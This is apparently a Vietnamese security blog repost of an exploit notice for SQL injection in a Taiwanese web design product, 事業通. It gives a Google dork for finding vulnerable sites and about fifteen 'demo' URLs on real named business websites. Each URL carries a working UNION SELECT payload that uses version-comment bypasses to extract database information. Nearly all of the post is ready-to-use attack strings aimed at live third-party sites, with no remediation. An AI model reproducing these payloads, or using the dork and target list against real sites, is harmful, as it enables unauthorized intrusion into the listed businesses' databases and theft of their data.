Share Dork Web Trung Quốc Lỗi SQL Injection

Exploit  : Web Design 事業通 SQL Injection
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://tw.sayato.com/
Google Dork : intext:"事業通" news_show.php
Tested On : Win 10 / Google Chrome / Mozilla Firefox



Demos
demos :
http://www.happyfun.tw/news_show.php?vip_no=3&listrecno=-237%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
 http://www.shoouhaw.com.tw/news_show.php?vip_no=4&listrecno=-253%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
 http://www.xining.com.tw/news_show.php?b_recno=-2%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-
 http://www.ed-consulting.com.tw/news_show.php?b_recno=-6328%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-
 http://suncue39.com/news_show.php?b_recno=-7242%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-
 http://www.chincheng-hardware.com.tw/news_show.php?b_recno=-7042%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-
 http://godpursue.com.tw/news_show.php?b_recno=-7230%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-
 http://www.rongfa.com.tw/news_show.php?b_recno=-6713%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-
 http://www.hong-tai.tw/news_show.php?b_recno=-4973%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-
 http://www.ch304.com.tw/news_show.php?b_recno=-5342%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-
 http://www.buy9.tw/news_show.php?b_recno=-7151%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-
 http://twfactory.com/news_show.php?b_recno=-1673%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-
 http://www.twdrybox.com/news_show.php?b_recno=-2580%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-
 http://xn--fiq43l9wjiy3apzb.tw/news_show.php?b_recno=-5711%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-
 http://www.dry-cabinet.com.tw/news_show.php?b_recno=-2583%27+/*!50000UNION*/+/*!50000SELECT*/+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--%20-

Share on Google Plus

About Vo Uu

Tác Giả là người chuyên nghiên cứu về các kỹ thuật hacking, security, marketing, là người có góc nhìn lạ và đi sâu vấn đề cũng như là một con người thẳng thắn góp ý. Nếu sử dụng bài trên blog mong các bạn dẫn lại nguồn tác giả!!! Tác Giả rất mong có sự đóng góp hội ý từ cộng đồng để cho an toàn an ninh mạng việt nam ngày càng được an toàn hơn!!